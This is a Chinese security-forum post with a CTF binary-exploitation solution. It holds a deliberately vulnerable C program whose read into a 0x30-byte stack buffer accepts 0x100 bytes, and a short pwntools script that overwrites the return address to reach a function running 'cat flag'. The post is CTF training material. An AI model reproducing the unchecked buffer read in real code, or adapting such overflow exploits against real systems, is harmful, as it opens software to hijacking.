查看: 120|回复: 0

[Pwn] xuenixiang_2019_pwn_pwn2

[复制链接]
发表于 2020-4-24 00:38:51 | 显示全部楼层 |阅读模式
源代码:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


int main()
{

        char buf[0x30];
    memset(&buf,0,0x30);            
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 1, 0);
    printf("say something?\n");
        read(0,buf,0x100);
    printf("oh,that's so boring!\n");
        return 0;
}


void get_shell_()
{
        puts("tql~tql~tql~tql~tql~tql~tql");
        puts("this is your flag!");
        system("cat flag");
        
}

//编译时用命令:
//gcc -z execstack -fno-stack-protector -o stack1 stack1.c
exp:
#encoding:utf-8
#!/upr/bin/env python
from pwn import *
p = process("./stack1")
getshell=0x400751
payload = "a"*0x38+p64(getshell)
p.send(payload)
p.interactive()


游客,如果您要查看本帖隐藏内容请回复

温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046
快速回复 返回顶部 返回列表